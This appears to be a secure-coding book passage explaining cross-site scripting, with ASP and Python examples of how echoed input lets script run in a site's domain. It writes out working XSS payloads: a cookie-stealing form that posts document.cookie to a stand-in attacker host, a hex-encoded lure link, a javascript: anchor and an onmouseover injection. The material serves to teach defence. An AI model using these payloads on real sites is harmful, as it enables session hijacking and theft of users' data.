Cross-Site Scripting: When Output Turns Bad

I often hear people say that cross-site scripting (XSS) issues are the most difficult attacks to explain to end users and yet they are among the easiest to exploit. I think what makes them hard to understand is the nature of the attack: the client is compromised because of a flaw in one or more Web pages. About three years ago, no one had heard of cross-site scripting issues, but now I think it's safe to say we hear of at least one or two issues per day on the Web. So, what is the problem and why is it serious? The problem is twofold:

A Web site trusts input from an external, untrusted entity.
The Web site displays said input as output.

I bet you've seen ASP code like this before:

Hello, &nbsp; <% Response.Write(Request.Querystring("name")) %>

This code will write out to the browser whatever is in the name field in the QueryString; for example, www.contoso.com/req.asp?name=Blake. That seems okay, but what if an attacker can convince a user to click a link of this form, for example on a Web page, in a newsgroup, or in an e-mail message? That doesn't seem like a big deal until you realize that an attacker could have the unsuspecting user click on the link in this code:

<a href=www.contoso.com/req.asp?name=scriptcode> Click here to win $1,000,000</a>

where the scriptcode block is this:

<script>x=document.cookie;alert(x);</script>

Note that the payload normally would not look like this; it's too easy for the victim to realize that something is amiss. Instead, the attacker will encode most of the payload to yield this:

<a href="http://www.microsoft.com@%77%77%77%2E%65%78%70%6C%6F%72%61%74%69%6F%6E%61%69%72%2E%63%6F%6D%2F%72%65%71%2E%61%73%70%3F%6E%61%6D%65%3D%3C%73%63%72%69%70%74%3E%78%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%61%6C%65%72%74%28%78%29%3B%3C%2F%73%63%72%69%70%74%3E"> Click here to win $1,000,000</a>

Notice two aspects about this. First, the link looks like it goes to www.microsoft.com, but it does not! It uses a little-known, but valid, URL format: http://username:password@webserver. This is defined in RFC 1738, Uniform Resource Locators (URL), at ftp://ftp.isi.edu/in-notes/rfc1738.txt. The most relevant text, from 3.1. Common Internet Scheme Syntax, reads like this:

While the syntax for the rest of the URL may vary depending on the particular scheme selected, URL schemes that involve the direct use of an IP-based protocol to a specified host on the Internet use a common syntax for the scheme-specific data: //<user>:<password>@<host>:<port>/<url-path>.

Note that each part of the URL is optional. Now look at the URL again: the www.microsoft.com reference is bogus. It's not the real URL whatsoever. It's a username, followed by the real Web site name, and it is hex-encoded to make it harder for the victim to determine what the real request is for!
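To see what the encoded link really asks for, it can be decoded and split into its parts. The following is a minimal Python sketch using only the standard library; the link is the sample one shown above, and the variable names are my own. Note that the host in this particular sample decodes to www.explorationair.com.

```python
from urllib.parse import unquote, urlsplit

# The sample link from the text, with the hex-encoded portion kept verbatim.
link = (
    "http://www.microsoft.com@"
    "%77%77%77%2E%65%78%70%6C%6F%72%61%74%69"
    "%6F%6E%61%69%72%2E%63%6F%6D%2F%72%65%71%2E%61%73%70%3F%6E%61%6D%65%3D%3C"
    "%73%63%72%69%70%74%3E%78%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B"
    "%61%6C%65%72%74%28%78%29%3B%3C%2F%73%63%72%69%70%74%3E"
)

# Undo the percent-encoding, then split the URL into its components.
decoded = unquote(link)
parts = urlsplit(decoded)

print("username:", parts.username)  # the bogus part the victim notices
print("host:    ", parts.hostname)  # the server that actually gets the request
print("path:    ", parts.path)
print("query:   ", parts.query)     # the script payload in the name parameter
```

Everything before the @ sign is reported as the username, and the real host only becomes readable after decoding.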

OK, back to the XSS issue. The problem is the name parameter: it's not a name, but rather HTML and JavaScript, which could be used to access user data, such as the user's cookie through the document.cookie object. As you may know, cookies are tied to a domain; for example, a cookie in the contoso.com domain can be accessed only by Web pages in that domain, so a Web page in the microsoft.com domain cannot access it. Now think for a moment: when the user clicks the link above, in what domain does the script code execute? To answer this, simply ask yourself, "Where did the page come from?" The page came from the contoso.com domain, so it can access the cookie data in the contoso.com domain. The problem is that only one page in a domain needs to have this kind of flaw to render all data on a client computer tied to that domain insecure. This code does nothing more than display the cookie in the user's browser. Of course, an attacker can do more harm, but I'll cover that later.
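To make the reflection concrete, the ASP page shown earlier can be imitated in a few lines of Python. This is only a sketch: render_greeting is a hypothetical stand-in for the Response.Write call, and the final line uses Python's html.escape purely as a contrast, not as a complete remedy.

```python
import html


def render_greeting(name: str) -> str:
    """Hypothetical stand-in for the ASP page: echo the value unchanged."""
    return "Hello, &nbsp; " + name


payload = "<script>x=document.cookie;alert(x);</script>"

# A benign name is displayed as text.
print(render_greeting("Blake"))

# The payload is emitted verbatim, so the browser treats it as script
# that belongs to the page's own domain.
print(render_greeting(payload))

# For contrast: once the value is HTML-encoded, the same input is inert text.
print(render_greeting(html.escape(payload)))
```

The second line of output contains a live script block; the third contains only encoded text that the browser would display rather than run.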

Let me put this in perspective. In late 2001, a vulnerability was discovered in a Web page in the passport.com domain that had a very subtle flaw similar to the example above. By sending a Hotmail recipient a specially crafted e-mail, the attacker could cause script to execute in the passport.com domain because Hotmail is in the hotmail.passport.com domain. And this means the code could access the cookies generated by the Passport service used to authenticate the client. When the attacker replayed those cookies (remember that a cookie is just a header in the HTTP request), he could spoof the e-mail recipient and access data that only that recipient could normally access.
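The point that a cookie is just a header can be illustrated with a short Python sketch. Nothing is sent over the network here; the cookie name, its value, and the inbox.asp path are invented for illustration and are not taken from the Passport incident.

```python
from urllib.request import Request

# Hypothetical cookie text; any client that knows it can present it.
cookie_text = "SessionTicket=abc123"

# Build (but do not send) a request that carries the cookie as a plain header.
req = Request(
    "http://www.contoso.com/inbox.asp",  # hypothetical page
    headers={"Cookie": cookie_text},
)

print(req.get_method(), req.full_url)
print(req.header_items())
```

From the server's side, the request is identified only by the header it carries, which is why a cookie read by script is as good as the user's own session.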

Through cross-site scripting attacks, cookies can be read or changed (this is also called poisoning); browser plug-ins or native code tied to a domain (for example, using the SiteLock ActiveX template, discussed in Chapter 16, "Securing RPC, ActiveX Controls, and DCOM") can be instantiated and scripted with untrusted data; and user input can be intercepted. In short, the attacker has unfettered access to the browser's object model in the security context of the compromised domain.

A more insidious attack is Web server spoofing. Imagine that a news site has an XSS flaw. Using that flaw, the attacker has full access to the object model in the security context of the news site, so if the attacker can get a victim to navigate to the Web site, he can display a news article that comes from the attacker's site yet appears to originate from the news site's Web server.

Figure 13-1 should help outline the attack.

Figure 13-1. How XSS attacks work.

More Info
The real reason XSS issues exist is that data and code are mixed together. Refer to "Don't Mix Code and Data" in Chapter 3, "Security Principles to Live By," for more detail about this insecure design issue.

Any Web browser supporting scripting is potentially vulnerable. Furthermore, data gathered by the malicious script can be sent back to the attacker's Web site. For example, if the script has used the Dynamic HTML (DHTML) object model to extract data from a page, a cross-site scripting attack can send the data to the attacker. Look at this example to see what I mean:

<a href=http://www.contoso.com/req.asp?name=
  <FORM action=http://www.badsite-sample-13.com/data.asp method=post id="idForm">
    <INPUT name="cookie" type="hidden">
  </FORM>
  <SCRIPT>
    idForm.cookie.value=document.cookie;
    idForm.submit();
  </SCRIPT> >
Click here!
</a>

Note that normally this HTML code is escaped; I just broke it out in an unescaped form to make it readable. When the user clicks the link, the user's cookie is sent to another Web site.

IMPORTANT
Using SSL/TLS does not mitigate cross-site scripting issues.

XSS attacks can be used against machines behind firewalls. Many corporate local area networks (LANs) are configured such that client machines trust servers on the LAN but do not trust servers on the outside Internet. However, a server outside a firewall can fool a client inside the firewall into believing that a trusted server inside the firewall has asked the client to execute a program. All the attacker needs is the name of a Web server inside the firewall that does not validate data in a Web page. (This Web server could be using a form field or querystring.) Finding such a server isn't easy unless the attacker has some inside knowledge, but it is possible.

XSS attacks can be persisted via cookies if an XSS bug exists in a site that outputs data from cookies onto a page. To pull this off, the attacker simply infects the cookie with malicious script, and each time the victim goes back to that site, the script in the cookie is displayed, the malicious code runs, and the attack is persistent until the user removes the cookie.

More Info
A wonderful explanation of XSS issues is also available in "Cross-Site Scripting Overview" at http://www.microsoft.com/technet/itsolutions/security/topics/csoverv.asp. And a great resource is the Open Web Application Security Project at http://www.owasp.org.

Sometimes the Attacker Doesn't Need a <SCRIPT> Block

Sometimes, the user-supplied data is inserted in a script block. In this case, it's not necessary for the attacker to include the <script> tag because it's already provided by the Web site developer. However, it does mean that the result must be valid script syntax.
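As a rough illustration, suppose a page places the user's value inside a string literal in an existing script block. The template below is hypothetical, and render_script is a Python stand-in for whatever server-side code builds the page.

```python
def render_script(name: str) -> str:
    """Hypothetical vulnerable page: the value lands inside a script string literal."""
    return '<script>var userName = "' + name + '";</script>'


# No <script> tag is needed. The input closes the string literal, adds a
# statement, and comments out the leftover quote so the syntax stays valid.
payload = '"; alert(document.cookie); //'

print(render_script("Blake"))
print(render_script(payload))
```

The second page contains the attacker's statement as ordinary script, which is why the injected text has to form valid syntax together with the code around it.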

You should be aware that the src attribute of an <img> tag and the href attribute of an <a> tag can also point to script code, not just a classic URL. For example, the following is a valid anchor:

<a href="javascript:alert(1);">Click here to win $1,000,000!</a>

No script block here!

The Attacker Doesn't Need the User to Click a Link!

I know you're thinking, "But the user has to click a link to get this to happen." Luckily for the attackers, some attacks can be automated and require little or no user interaction. The easiest attack to pull off is when the input in the querystring, form, or some other data is used to build part of an HTML tag. For example, imagine the user's input builds this:

<a href=<%= request.querystring("url")%>>Click Here</a>

What's wrong with this? The attacker could provide the following in the url variable in the querystring:

http://www.microsoft.com onmouseover="malicious-script"

This will add a mouseover event to the resulting HTML output. Now the user simply needs to move the mouse over the anchor text, and the exploit script will work. The more astute among you will realize that many tags can include onload or onactivate events, in which case the attack could happen with no user interaction at all. Need I say more?
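The effect of the unquoted href can be checked with a short Python sketch. Here render_link is a hypothetical stand-in for the ASP line above, and Python's html.parser is used only to show how the resulting tag is split into attributes; a real browser's parser may differ in details.

```python
from html.parser import HTMLParser


class AttrCollector(HTMLParser):
    """Record the attributes of the first anchor tag seen."""

    def __init__(self):
        super().__init__()
        self.anchor_attrs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a" and not self.anchor_attrs:
            self.anchor_attrs = attrs


def render_link(url: str) -> str:
    """Hypothetical stand-in for the ASP page: unquoted href built from input."""
    return "<a href=" + url + ">Click Here</a>"


attacker_url = 'http://www.microsoft.com onmouseover="malicious-script"'
page = render_link(attacker_url)

collector = AttrCollector()
collector.feed(page)

print(page)
print(collector.anchor_attrs)
```

Because the href value is not quoted, the space ends it, and the rest of the input is parsed as a second attribute: an event handler the page author never wrote.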